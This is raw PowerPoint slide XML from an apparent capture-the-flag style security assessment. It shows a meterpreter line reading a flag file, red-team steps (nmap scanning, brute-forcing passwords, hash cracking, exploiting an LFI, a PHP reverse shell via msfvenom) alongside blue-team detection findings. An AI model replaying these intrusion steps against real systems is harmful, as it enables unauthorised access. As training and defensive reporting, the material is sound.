                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>meterpreter &gt; cat flag.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="596900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	Results: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>b1ng0w@5h1sn@m0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="596900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8655E2E4-5473-4301-8F5A-37EF0D7ADCC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3597965" y="1447253"/>
            <a:ext cx="3823252" cy="3442718"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{598B00E2-EAA1-4B24-BBE9-D3623988A8A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1349710" y="2004574"/>
            <a:ext cx="2124371" cy="352474"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3962937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Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Assessment Summary</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EDA9A58-6383-49AF-8BC2-D1ED7B8E60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63B2-64E5-4B1D-A905-E53D5BA58452}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Assessment Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B22B184-0C32-4E1C-99B9-1B9D68FF78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
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5B2C3CC-764B-4BDC-9DFB-CAAC19AE6EEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1556152"/>
            <a:ext cx="4623981" cy="2664665"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="139700" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Red Team</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reconnaissance of vulnerable machine using nmap.</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Accessed the system via HTTP Port 80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Found Root accessibility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Found the occurrence of simplistic usernames and weak passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Brute Forced passwords to gain system access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cracked a hashed password to gain system access and use a shell script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Identified a LFI vulnerability and exploited it with a shell script.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Identified Directory Indexing vulnerability CWE-548</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C383B57D-BF44-45B9-A100-AA3D32E293C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4446443" y="136073"/>
            <a:ext cx="695400" cy="521227"/>
            <a:chOff x="6158406" y="706960"/>
            <a:chExt cx="695400" cy="737003"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Google Shape;1038;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F1CE0C1-2E88-41AF-8F51-D3C7B227528F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6158406" y="706960"/>
              <a:ext cx="695400" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030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mn-lt"/>
                  <a:ea typeface="STFangsong" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                  <a:cs typeface="Roboto Thin"/>
                  <a:sym typeface="Roboto Thin"/>
                </a:rPr>
                <a:t>AS</a:t>
              </a:r>
              <a:endParaRPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="STFangsong" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Roboto Thin"/>
                <a:sym typeface="Roboto Thin"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Google Shape;1039;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D37EAFCF-D3DF-4E31-B435-A0A42B204E70}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="6335944" y="1255338"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">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TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{376B941A-6A7D-40B8-95B8-C90362E05BFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4094922" y="1556152"/>
            <a:ext cx="4936434" cy="1315745"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="139700" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3D85C6"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Blue Team</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1050" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-317500">
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Confirmed that a port scan occurred</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-317500">
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Found requests for a hidden directories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-317500">
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Uncovered the Brute Force Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-317500">
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Found requests to access critical system folders and files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-317500">
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Identified a WebDAV vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1100" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7DA57D6-99E4-4DD1-8772-64755C90E8F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="335945" y="4352622"/>
            <a:ext cx="8472110" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Continuous monitoring and communication between the security team and the employees will ensure swift response and prevention to attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18CCA513-B178-4D3A-A209-5161B571D4C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="335945" y="817488"/>
            <a:ext cx="8271830" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As a company, it is important to think, not if a security breaches will occur, but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>when and how</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2176466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F843F-EF1A-4FE4-89E0-698CB35ED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Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F34BBE8-6472-4E71-ADAF-46E0FE0C0088}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="2000" dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Subtitle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{602BF427-D4E8-42FA-AA59-538912300FD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Instructions for PHP Reverse Shell Exploit using msfvenom msfconsole Hydra from Kali Linux –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Continued…</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB0E4B19-D40F-4250-9DD6-730102A8F0BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="3625680"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="j"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>CVE-2019-6579 Detail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>NIST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Vulnerabilities National Institute of Standards and Technology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="k"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>CVE-2007-0450 Detail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>NIST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Vulnerabilities National Institute of Standards and Technology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>CVE-2019-13386 Detail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>NIST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
